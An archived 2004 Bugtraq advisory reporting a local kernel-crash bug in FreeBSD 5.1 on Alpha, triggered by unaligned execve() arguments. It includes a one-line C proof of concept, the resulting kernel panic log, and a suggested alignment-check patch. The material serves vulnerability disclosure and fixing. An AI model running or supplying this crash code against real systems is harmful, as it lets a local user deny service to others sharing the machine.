lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <40D97425.9000906@marcetam.net>
Date: Wed, 23 Jun 2004 14:14:29 +0200
From: Marceta Milos <root@...cetam.net>
To: bugtraq@...urityfocus.com
Subject: Security Advisory : FreeBSD local DoS


Security Advisory : FreeBSD local DoS

Systems affected:

FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable.
FreeBSD 5.1-RELEASE/IA32 is _not_ vulnerable.

Not sure about other FreeBSD/arch but they could be vulnerable too.

Risk: low

Date: 23 June 2004

Legal notice:

1. This Advisory is Copyright (c) 2004 Marceta Milos.
2. You may distribute it unmodified. 
3. You may not modify it and distribute it or distribute
   parts of it without the author's permission.
4. This document stays open for revision. Anything may
   change without notice. For a possible update you may
   visit author's homepage which should be redesigned soon.


Disclaimer:

I am not responsible for any damage caused by use
of the information provided in this document.


Description:

It is possible to crash kernel on FreeBSD/Alpha, by passing unaligned
memory address as a 2nd or 3rd argument to execve() syscall.


Condition: 

To crash the system, first arg of execve() must point to accessible filename.


Demonstration code:

# cat kernkill.c 

/*
* FreeBSD/Alpha local DoS
*    by Marceta Milos
*    root@...cetam.net
*
*/

char main() { execve("/bin/ls",(int *)(main + 1), 0); }

/* eof */

# gcc kernkill.c -okk
#./kk

fatal kernel trap:

  trap entry     = 0x4 (unaligned access fault)
  cpuid          = 0
  faulting va    = 0x120000891
  opcode         = 0x29
  register       = 0x0
  pc             = 0xfffffc0000651bf0
  ra             = 0xfffffc00004900e0
  sp             = 0xfffffe0039c3f840
  usp            = 0x11fffae0
  curthread      = 0xfffffc00620a3720

      pid = 713, comm = kk

panic: trap
cpuid = 0;

syncing disks, buffers remaining... 234 234 232 232 232 232 231 232 231 231 231
231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231 231
giving up on 141 buffers
Uptime: 13m13s
Automatic reboot in 15 seconds - press a key on the console to abort
Rebooting...


Workaround:

You may make a proper use of ALIGNED_POINTER macro which already exists in
src/sys/alpha/include/param.h to check if ptrs are aligned, or make your
own like:

#define PTR_ALIGNED(x) (((x) & 0x7) == 0)

Putting the following line at the top of execve() in src/sys/kern/kern_exec.c
should prevent the crash (unfortunatly, this is not tested. Idea is mine, a
little corrected by Mr. Dag-Erling Smørgrav, FreeBSD deputy security officer):

	if (!PTR_ALIGNED(uap->argv) || !PTR_ALIGNED(uap->envv))
		return (EFAULT);


Vendor status: FreeBSD was notified on Sat 19/06/2004 23:50 -0000

Greets to: LSD, teso, phenoelit, synnergy, thc, netric, scut, silvio, stinger && eSDee.





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ